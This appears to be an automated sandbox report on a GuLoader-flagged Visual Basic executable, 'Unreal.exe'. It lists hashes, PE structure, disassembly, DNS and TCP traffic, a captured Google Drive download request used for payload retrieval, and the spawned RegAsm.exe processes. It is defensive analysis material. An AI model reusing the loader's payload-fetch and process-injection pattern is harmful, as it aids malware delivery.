                  Entropy (8bit):7.999076442471787
                  Encrypted:true
                  SSDEEP:196608:YXO9SVxVkHWgVLfT19HDihdTNpwvjAkE36nywlAVILpzyyaW27:YZXmHdBfpMjUlywlAat3Bm
                  MD5:8B78E09BD2D0734CF4EDB44C68F22368
                  SHA1:E9C0F6D912ED28066201118AA296493A738E8D7F
                  SHA-256:7FEA9243F8AFF82658D32716D7D668EFD6986D78E15C5E3E35CDD94B565BA32A
                  SHA-512:36C255E4768179257F0B5A9B9B15C21113FED29633144302B6FD90C96D7AD9D5116CD77E9822F0389A4B7904A739F8B295513D5528B354CD9EC70DA7D5AF160F
                  Malicious:false
                  Antivirus:
                  • Antivirus: Virustotal, Detection: 0%, Browse
                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........<..R...R...R......R..P...R.Rich..R.PE..d.....Qa.........." ..........v..............................................Pv.......v...`.......................................................... ..8+v..........0v..!...........................................................................................rdata..p...........................@..@.rsrc...8+v.. ...,v.................@..@......Qa........T........................rdata......T....rdata$zzzdbg.... .......rsrc$01..... ..x*v..rsrc$02............................................................................................................................................................................................................................................................................................................................................................................................
                  C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\mpavdlta.vdm
                  Process:C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-20b5c938.exe
                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                  Category:modified
                  Size (bytes):5016504
                  Entropy (8bit):7.997724088667752
                  Encrypted:true
                  SSDEEP:98304:HHeb+Ze66NXRdSKHWdezWUTIm0GXodoubtS8RVZGgA7ASskPCDL5MeS8YjN:H+aZN6NXRdSdCWUTILGI3pGXdrP8LPSl
                  MD5:C64D6E20AF376A357E27E01E81023E58
                  SHA1:348B30450CA17871D3957502CF28183B1B3FD8C1
                  SHA-256:8D427A5CB59EFC21A66E8A7E2EBCDE0F7B1E71EA0E4627B04443667C6992614D
                  SHA-512:52E5BDA32BE278C578B5377FD08EBD928B88802E8883B50F06FC6EDF45E287831BC5D2245F2984E5AECD67BC24BC293BF3FC9C266E91D3FAABB092D598F8A944
                  Malicious:false
                  Antivirus:
                  • Antivirus: Virustotal, Detection: 0%, Browse
                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........<..R...R...R......R..P...R.Rich..R.PE..d.....Qa.........." .........hL...............................................L......GM...`.......................................................... ...eL..........jL..!...........................................................................................rdata..p...........................@..@.rsrc....eL.. ...fL.................@..@......Qa........T........................rdata......T....rdata$zzzdbg.... .......rsrc$01..... ...dL..rsrc$02............................................................................................................................................................................................................................................................................................................................................................................................
                  C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\MpSigStub.log
                  Process:C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exe
                  File Type:Little-endian UTF-16 Unicode text, with CRLF, CR line terminators
                  Category:modified
                  Size (bytes):6856
                  Entropy (8bit):3.555984344338531
                  Encrypted:false
                  SSDEEP:96:BRKisMYmA2KxoZvHoBYETZWDzrH+LBWjz5f0hSsFX:nKioD2Kx0HoNer0GB0vl
                  MD5:9A80E0210B6CC8C743A2B0286A426983
                  SHA1:614CA8E4EA8E2DE3A141C1BB7CFA03EE27259CEA
                  SHA-256:D410EF955BDCD1127A2D87A70AE04285B1B609B8C5F0C6AD31E6DA6164A351FF
                  SHA-512:51FD352689AFA312917EC50A8DFF35179E13181B9D0DEF7B0647E2A8975F371DB0C345E2B69D0A08908D6DF0DE157BCAF7FEA38686811701F2C75F1ACD57785D
                  Malicious:false
                  Preview: ..-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....S.t.a.r.t. .t.i.m.e.:. .2.0.2.1.-.0.9.-.2.7. .1.5.:.3.8.:.0.3.Z.....P.r.o.c.e.s.s.:. .2.3.9.0...1.d.7.b.3.b.5.a.8.d.2.b.a.0.c.....C.o.m.m.a.n.d.:. ./.s.t.u.b. .1...1...1.8.5.0.0...1.0. ./.p.a.y.l.o.a.d. .1...3.4.9...1.4.9.6...0. ./.p.r.o.g.r.a.m. .C.:.\.W.i.n.d.o.w.s.\.S.E.R.V.I.C.~.1.\.N.E.T.W.O.R.~.1.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.m.p.a.m.-.2.0.b.5.c.9.3.8...e.x.e. ./.q. .W.D.....A.d.m.i.n.i.s.t.r.a.t.o.r.:. .n.o.....V.e.r.s.i.o.n.:. .1...1...1.8.5.0.0...1.0.........=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=. .P.r.o.d.u.c.t.S.e.a.r.c.h. .=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=......... . . . . . . . . . . . . . . .M.i.c.r.o.s.o.f.t. .W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r. .(.R.S.1.+.).:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..... . . . . . . .S.t.a.t.

                  Static File Info

                  General

                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                  Entropy (8bit):6.281321845122127
                  TrID:
                  • Win32 Executable (generic) a (10002005/4) 99.15%
                  • Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81%
                  • Generic Win/DOS Executable (2004/3) 0.02%
                  • DOS Executable Generic (2002/1) 0.02%
                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                  File name:Unreal.exe
                  File size:102400
                  MD5:35a93d1f2edc044b3d8289abfeb17a43
                  SHA1:c29f2524ae4bd239c849720b1fc6ce5c13bee93b
                  SHA256:88d3b3a6564e25b63b31f4a00361384fd294f228763b3bde4e3162144971d385
                  SHA512:dab0233817f1a28f0e1d15eb449d9c3c364796f6ddd66ced4307f3359635c29f38f80edd5e348bba03dd01d5522d358df1abd6d59e9ae94e750238af53b04bff
                  SSDEEP:1536:yS+Spugs2L010fBhmNDLI41mFLHvHWJbrZk5Le5O3VzM/:F5puZA01iBYNh1m1HvHwfZkRz0
                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......u...1...1...1.......0...~...0.......0...Rich1...........PE..L...UL[W.................P...0...............`....@................

                  File Icon

                  Icon Hash:78f8d6d4ac88d0e2

                  Static PE Info

                  General

                  Entrypoint:0x4012d4
                  Entrypoint Section:.text
                  Digitally signed:false
                  Imagebase:0x400000
                  Subsystem:windows gui
                  Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                  DLL Characteristics:
                  Time Stamp:0x575B4C55 [Fri Jun 10 23:25:09 2016 UTC]
                  TLS Callbacks:
                  CLR (.Net) Version:
                  OS Version Major:4
                  OS Version Minor:0
                  File Version Major:4
                  File Version Minor:0
                  Subsystem Version Major:4
                  Subsystem Version Minor:0
                  Import Hash:1eb0aaa4f15bbd841e91215ce68e26d2

                  Entrypoint Preview

                  Instruction
                  push 00413CE4h
                  call 00007F8700B55125h
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  xor byte ptr [eax], al
                  add byte ptr [eax], al
                  cmp byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  pop es
                  retf
                  dec ebx
                  enter 5C49h, 45h
                  or byte ptr [eax-32482CABh], 0000002Dh
                  mov dword ptr [eax], 00000000h
                  add byte ptr [ecx], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add al, ah
                  call 00007F8779FC5154h
                  insd
                  outsb
                  outsd
                  add byte ptr [ecx+00h], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  dec esp
                  xor dword ptr [eax], eax
                  add dword ptr [55396847h], ebp
                  retf
                  adc ecx, dword ptr [ecx-62h]
                  xor ch, ch
                  mov byte ptr [edx+ebx*2], dl
                  xor ah, byte ptr [ecx+05h]
                  adc al, dh
                  stosd
                  in eax, 79h
                  push ecx
                  inc eax

                  Data Directories

                  NameVirtual AddressVirtual Size Is in Section
                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_IMPORT0x153b40x28.text
                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x170000x1cb8.rsrc
                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x2280x20
                  IMAGE_DIRECTORY_ENTRY_IAT0x10000xdc.text
                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                  Sections

                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                  .text0x10000x147880x15000False0.563720703125data6.65071196081IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                  .data0x160000x9f40x1000False0.00634765625data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                  .rsrc0x170000x1cb80x2000False0.26416015625data3.4642899067IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                  Resources

                  NameRVASizeTypeLanguageCountry
                  CUSTOM0x18b7a0x13eMS Windows icon resource - 1 icon, 16x16, 16 colorsEnglishUnited States
                  CUSTOM0x185fc0x57eMS Windows icon resource - 1 icon, 16x16, 8 bits/pixelEnglishUnited States
                  CUSTOM0x1807e0x57eMS Windows icon resource - 1 icon, 16x16, 8 bits/pixelEnglishUnited States
                  CUSTOM0x17f400x13eMS Windows icon resource - 1 icon, 16x16, 16 colorsEnglishUnited States
                  RT_ICON0x178d80x668dBase IV DBT of `.DBF, block length 1536, next free block index 40, next free block 252, next used block 65280
                  RT_ICON0x175f00x2e8data
                  RT_ICON0x174c80x128GLS_BINARY_LSB_FIRST
                  RT_GROUP_ICON0x174980x30data
                  RT_VERSION0x172300x268MS Windows COFF Motorola 68000 object fileEnglishUnited States

                  Imports

                  DLLImport
                  MSVBVM60.DLL_CIcos, _adj_fptan, __vbaFreeVar, __vbaStrVarMove, __vbaFreeVarList, _adj_fdiv_m64, _adj_fprem1, __vbaHresultCheckObj, _adj_fdiv_m32, __vbaAryDestruct, __vbaOnError, __vbaObjSet, _adj_fdiv_m16i, _adj_fdivr_m16i, __vbaFpR8, _CIsin, __vbaChkstk, EVENT_SINK_AddRef, __vbaGenerateBoundsError, __vbaStrCmp, _adj_fpatan, __vbaRedim, EVENT_SINK_Release, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, _CIlog, __vbaErrorOverflow, __vbaNew2, _adj_fdiv_m32i, _adj_fdivr_m32i, _adj_fdivr_m32, _adj_fdiv_r, __vbaFpI4, _CIatan, __vbaStrMove, _allmul, _CItan, _CIexp, __vbaFreeObj, __vbaFreeStr

                  Version Infos

                  DescriptionData
                  Translation0x0409 0x04b0
                  InternalNameUnreal
                  FileVersion1.00
                  CompanyNameCelRox
                  CommentsCelRox
                  ProductNameCelRox
                  ProductVersion1.00
                  FileDescriptionCelRox
                  OriginalFilenameUnreal.exe

                  Possible Origin

                  Language of compilation systemCountry where language is spokenMap
                  EnglishUnited States

                  Network Behavior

                  Network Port Distribution

                  TCP Packets

                  TimestampSource PortDest PortSource IPDest IP
                  Sep 27, 2021 16:33:03.858829021 CEST49763443192.168.11.20142.250.185.142
                  Sep 27, 2021 16:33:03.858911991 CEST44349763142.250.185.142192.168.11.20
                  Sep 27, 2021 16:33:03.859061956 CEST49763443192.168.11.20142.250.185.142
                  Sep 27, 2021 16:33:03.878380060 CEST49763443192.168.11.20142.250.185.142
                  Sep 27, 2021 16:33:03.878434896 CEST44349763142.250.185.142192.168.11.20
                  Sep 27, 2021 16:33:03.930304050 CEST44349763142.250.185.142192.168.11.20
                  Sep 27, 2021 16:33:03.930483103 CEST49763443192.168.11.20142.250.185.142
                  Sep 27, 2021 16:33:03.932199001 CEST44349763142.250.185.142192.168.11.20
                  Sep 27, 2021 16:33:03.932352066 CEST49763443192.168.11.20142.250.185.142
                  Sep 27, 2021 16:33:04.046665907 CEST49763443192.168.11.20142.250.185.142
                  Sep 27, 2021 16:33:04.046720982 CEST44349763142.250.185.142192.168.11.20
                  Sep 27, 2021 16:33:04.047358036 CEST44349763142.250.185.142192.168.11.20
                  Sep 27, 2021 16:33:04.047519922 CEST49763443192.168.11.20142.250.185.142
                  Sep 27, 2021 16:33:04.050981998 CEST49763443192.168.11.20142.250.185.142
                  Sep 27, 2021 16:33:04.093884945 CEST44349763142.250.185.142192.168.11.20
                  Sep 27, 2021 16:33:04.207621098 CEST44349763142.250.185.142192.168.11.20
                  Sep 27, 2021 16:33:04.207879066 CEST49763443192.168.11.20142.250.185.142
                  Sep 27, 2021 16:33:04.207932949 CEST44349763142.250.185.142192.168.11.20
                  Sep 27, 2021 16:33:04.208029032 CEST44349763142.250.185.142192.168.11.20
                  Sep 27, 2021 16:33:04.208098888 CEST49763443192.168.11.20142.250.185.142
                  Sep 27, 2021 16:33:04.208159924 CEST49763443192.168.11.20142.250.185.142
                  Sep 27, 2021 16:33:04.267347097 CEST49763443192.168.11.20142.250.185.142
                  Sep 27, 2021 16:33:04.267400980 CEST44349763142.250.185.142192.168.11.20

                  UDP Packets

                  TimestampSource PortDest PortSource IPDest IP
                  Sep 27, 2021 16:31:51.976603031 CEST5808553192.168.11.201.1.1.1
                  Sep 27, 2021 16:31:52.127249002 CEST53580851.1.1.1192.168.11.20
                  Sep 27, 2021 16:31:54.922883034 CEST5935453192.168.11.201.1.1.1
                  Sep 27, 2021 16:31:54.931360006 CEST53593541.1.1.1192.168.11.20
                  Sep 27, 2021 16:31:55.018204927 CEST5505453192.168.11.201.1.1.1
                  Sep 27, 2021 16:31:55.026866913 CEST53550541.1.1.1192.168.11.20
                  Sep 27, 2021 16:31:56.873502970 CEST5925053192.168.11.201.1.1.1
                  Sep 27, 2021 16:31:56.881999969 CEST53592501.1.1.1192.168.11.20
                  Sep 27, 2021 16:31:56.890342951 CEST5591053192.168.11.201.1.1.1
                  Sep 27, 2021 16:31:56.898772955 CEST53559101.1.1.1192.168.11.20
                  Sep 27, 2021 16:31:57.064750910 CEST5922253192.168.11.201.1.1.1
                  Sep 27, 2021 16:31:57.073412895 CEST53592221.1.1.1192.168.11.20
                  Sep 27, 2021 16:32:02.251159906 CEST5558453192.168.11.201.1.1.1
                  Sep 27, 2021 16:32:02.259998083 CEST53555841.1.1.1192.168.11.20
                  Sep 27, 2021 16:33:02.271327019 CEST5446153192.168.11.201.1.1.1
                  Sep 27, 2021 16:33:02.280339003 CEST53544611.1.1.1192.168.11.20
                  Sep 27, 2021 16:33:03.836004019 CEST5433853192.168.11.201.1.1.1
                  Sep 27, 2021 16:33:03.844651937 CEST53543381.1.1.1192.168.11.20
                  Sep 27, 2021 16:34:02.289022923 CEST5256753192.168.11.201.1.1.1
                  Sep 27, 2021 16:34:02.297930002 CEST53525671.1.1.1192.168.11.20
                  Sep 27, 2021 16:36:16.852319002 CEST6141253192.168.11.201.1.1.1
                  Sep 27, 2021 16:36:16.860439062 CEST53614121.1.1.1192.168.11.20
                  Sep 27, 2021 16:37:10.334578037 CEST4926853192.168.11.201.1.1.1
                  Sep 27, 2021 16:37:10.343050957 CEST53492681.1.1.1192.168.11.20
                  Sep 27, 2021 16:37:10.835084915 CEST4952953192.168.11.201.1.1.1
                  Sep 27, 2021 16:37:10.850014925 CEST53495291.1.1.1192.168.11.20
                  Sep 27, 2021 16:37:59.539233923 CEST6514453192.168.11.201.1.1.1
                  Sep 27, 2021 16:37:59.549747944 CEST53651441.1.1.1192.168.11.20
                  Sep 27, 2021 16:37:59.709568024 CEST6289553192.168.11.201.1.1.1
                  Sep 27, 2021 16:37:59.718099117 CEST53628951.1.1.1192.168.11.20
                  Sep 27, 2021 16:37:59.969018936 CEST6516053192.168.11.201.1.1.1
                  Sep 27, 2021 16:37:59.980292082 CEST53651601.1.1.1192.168.11.20
                  Sep 27, 2021 16:38:13.172786951 CEST4990553192.168.11.201.1.1.1
                  Sep 27, 2021 16:38:13.181143999 CEST53499051.1.1.1192.168.11.20
                  Sep 27, 2021 16:38:14.989168882 CEST5877653192.168.11.201.1.1.1
                  Sep 27, 2021 16:38:14.998239040 CEST53587761.1.1.1192.168.11.20
                  Sep 27, 2021 16:39:43.704673052 CEST4947653192.168.11.201.1.1.1
                  Sep 27, 2021 16:39:43.714154959 CEST53494761.1.1.1192.168.11.20

                  DNS Queries

                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                  Sep 27, 2021 16:33:03.836004019 CEST192.168.11.201.1.1.10x7402Standard query (0)drive.google.comA (IP address)IN (0x0001)
                  Sep 27, 2021 16:36:16.852319002 CEST192.168.11.201.1.1.10x7634Standard query (0)spclient.wg.spotify.comA (IP address)IN (0x0001)

                  DNS Answers

                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                  Sep 27, 2021 16:33:03.844651937 CEST1.1.1.1192.168.11.200x7402No error (0)drive.google.com142.250.185.142A (IP address)IN (0x0001)
                  Sep 27, 2021 16:36:16.860439062 CEST1.1.1.1192.168.11.200x7634No error (0)spclient.wg.spotify.comedge-web.dual-gslb.spotify.comCNAME (Canonical name)IN (0x0001)
                  Sep 27, 2021 16:36:16.860439062 CEST1.1.1.1192.168.11.200x7634No error (0)edge-web.dual-gslb.spotify.com35.186.224.25A (IP address)IN (0x0001)
                  Sep 27, 2021 16:37:10.343050957 CEST1.1.1.1192.168.11.200xacc3No error (0)prda.aadg.msidentity.comwww.tm.a.prd.aadg.trafficmanager.netCNAME (Canonical name)IN (0x0001)

                  HTTP Request Dependency Graph

                  • drive.google.com

                  HTTPS Proxied Packets

                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  0192.168.11.2049763142.250.185.142443C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
                  TimestampkBytes transferredDirectionData
                  2021-09-27 14:33:04 UTC0OUTGET /uc?export=download&id=1JZajQIQdUbLIFKGrWeKAj7F2g5cgApuC HTTP/1.1
                  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                  Host: drive.google.com
                  Cache-Control: no-cache
                  2021-09-27 14:33:04 UTC0INHTTP/1.1 404 Not Found
                  Content-Type: text/html; charset=UTF-8
                  x-chromium-appcache-fallback-override: disallow-fallback
                  P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                  Content-Security-Policy: script-src 'nonce-MIVbPGF4ZuXsZ2NZTTzVEQ' 'unsafe-inline' 'strict-dynamic' https: http: 'unsafe-eval';object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/drive-explorer/
                  Date: Mon, 27 Sep 2021 14:33:04 GMT
                  Expires: Mon, 27 Sep 2021 14:33:04 GMT
                  Cache-Control: private, max-age=0
                  X-Content-Type-Options: nosniff
                  X-Frame-Options: SAMEORIGIN
                  X-XSS-Protection: 1; mode=block
                  Server: GSE
                  Set-Cookie: NID=511=kWh_xUioAXmCXt6QIW6Mm4DtzPI9_fAr2WiFKEmXPAjZvuWqXj1I7phnbwK5qVZOA3KA2Dwc9IGtRHUtfxRy-aBcUQZ4zKf-uCz414_kuMrvIGUe_DgGauW80ouL5dhtM9v6jgmzo75QoUqo2k6HSanF5BaWh7W1UvFmn1Szn94; expires=Tue, 29-Mar-2022 14:33:04 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                  Accept-Ranges: none
                  Vary: Accept-Encoding
                  Connection: close
                  Transfer-Encoding: chunked
                  2021-09-27 14:33:04 UTC1INData Raw: 38 64 0d 0a 3c 48 54 4d 4c 3e 0a 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 46 46 46 46 46 46 22 20 54 45 58 54 3d 22 23 30 30 30 30 30
                  Data Ascii: 8d<HTML><HEAD><TITLE>Not Found</TITLE></HEAD><BODY BGCOLOR="#FFFFFF" TEXT="#00000
                  2021-09-27 14:33:04 UTC1INData Raw: 30 22 3e 0a 3c 48 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 31 3e 0a 3c 48 32 3e 45 72 72 6f 72 20 34 30 34 3c 2f 48 32 3e 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a 0d 0a
                  Data Ascii: 0"><H1>Not Found</H1><H2>Error 404</H2></BODY></HTML>
                  2021-09-27 14:33:04 UTC1INData Raw: 30 0d 0a 0d 0a
                  Data Ascii: 0


                  Code Manipulations

                  Statistics

                  Behavior

                  Click to jump to process

                  System Behavior

                  Analysis Process: Unreal.exe PID: 9076 Parent PID: 2216

                  General

                  Start time:16:31:53
                  Start date:27/09/2021
                  Path:C:\Users\user\Desktop\Unreal.exe
                  Wow64 process (32bit):true
                  Commandline:'C:\Users\user\Desktop\Unreal.exe'
                  Imagebase:0x400000
                  File size:102400 bytes
                  MD5 hash:35A93D1F2EDC044B3D8289ABFEB17A43
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:Visual Basic
                  Reputation:low

                  Analysis Process: RegAsm.exe PID: 6940 Parent PID: 9076

                  General

                  Start time:16:32:31
                  Start date:27/09/2021
                  Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
                  Wow64 process (32bit):false
                  Commandline:'C:\Users\user\Desktop\Unreal.exe'
                  Imagebase:0xb0000
                  File size:53248 bytes
                  MD5 hash:A64DACA3CFBCD039DF3EC29D3EDDD001
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:low

                  Analysis Process: RegAsm.exe PID: 7508 Parent PID: 9076

                  General

                  Start time:16:32:31
                  Start date:27/09/2021
                  Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
                  Wow64 process (32bit):true
                  Commandline:'C:\Users\user\Desktop\Unreal.exe'
                  Imagebase:0x980000
                  File size:53248 bytes
                  MD5 hash:A64DACA3CFBCD039DF3EC29D3EDDD001
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000008.00000002.5646431545.0000000000D50000.00000040.00000001.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000008.00000000.5536067468.0000000000D50000.00000040.00000001.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000008.00000000.5526072916.0000000000D50000.00000040.00000001.sdmp, Author: Joe Security
                  Reputation:low

                  Analysis Process: conhost.exe PID: 7772 Parent PID: 7508

                  General

                  Start time:16:32:31
                  Start date:27/09/2021
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff664700000
                  File size:875008 bytes
                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:low

                  Analysis Process: WerFault.exe PID: 3384 Parent PID: 7508

                  General

                  Start time:16:37:01
                  Start date:27/09/2021
                  Path:C:\Windows\SysWOW64\WerFault.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7508 -s 828
                  Imagebase:0x480000
                  File size:482640 bytes
                  MD5 hash:40A149513D721F096DDF50C04DA2F01F
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:Visual Basic
                  Reputation:low

                  Analysis Process: mpam-20b5c938.exe PID: 6140 Parent PID: 8212

                  General

                  Start time:16:38:00
                  Start date:27/09/2021
                  Path:C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-20b5c938.exe
                  Wow64 process (32bit):false
                  Commandline:'C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\mpam-20b5c938.exe' /q WD
                  Imagebase:0x7ff7fe970000
                  File size:13390280 bytes
                  MD5 hash:4CF0EA82FA547953BAA24CEB4AFDE935
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Reputation:low

                  Analysis Process: MpSigStub.exe PID: 9104 Parent PID: 6140

                  General

                  Start time:16:38:03
                  Start date:27/09/2021
                  Path:C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exe /stub 1.1.18500.10 /payload 1.349.1496.0 /program C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\mpam-20b5c938.exe /q WD
                  Imagebase:0x7ff742dc0000
                  File size:803176 bytes
                  MD5 hash:01F92DC7A766FF783AE7AF40FD0334FB
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Antivirus matches:
                  • Detection: 0%, Virustotal, Browse
                  • Detection: 0%, ReversingLabs
                  Reputation:low

                  Analysis Process: wevtutil.exe PID: 5464 Parent PID: 3144

                  General

                  Start time:16:38:04
                  Start date:27/09/2021
                  Path:C:\Windows\System32\wevtutil.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\wevtutil.exe uninstall-manifest C:\Windows\TEMP\A491FE0B-CBB3-0812-A9E9-28E6069853FA.man
                  Imagebase:0x7ff7baff0000
                  File size:291840 bytes
                  MD5 hash:C57C1292650B6384903FE6408D412CFA
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:low

                  Analysis Process: conhost.exe PID: 8100 Parent PID: 5464

                  General

                  Start time:16:38:05
                  Start date:27/09/2021
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff664700000
                  File size:875008 bytes
                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:low

                  Analysis Process: wevtutil.exe PID: 6516 Parent PID: 3144

                  General

                  Start time:16:38:06
                  Start date:27/09/2021
                  Path:C:\Windows\System32\wevtutil.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\wevtutil.exe install-manifest C:\Windows\TEMP\A491FE0B-CBB3-0812-A9E9-28E6069853FA.man '/resourceFilePath:C:\ProgramData\Microsoft\Windows Defender\Definition Updates\StableEngineEtwLocation\mpengine_etw.dll' '/messageFilePath:C:\ProgramData\Microsoft\Windows Defender\Definition Updates\StableEngineEtwLocation\mpengine_etw.dll' '/parameterFilePath:C:\ProgramData\Microsoft\Windows Defender\Definition Updates\StableEngineEtwLocation\mpengine_etw.dll'
                  Imagebase:0x7ff7baff0000
                  File size:291840 bytes
                  MD5 hash:C57C1292650B6384903FE6408D412CFA
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:low

                  Analysis Process: conhost.exe PID: 3060 Parent PID: 6516

                  General

                  Start time:16:38:06
                  Start date:27/09/2021
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff664700000
                  File size:875008 bytes
                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:low

                  Disassembly

                  Code Analysis

                  Reset < >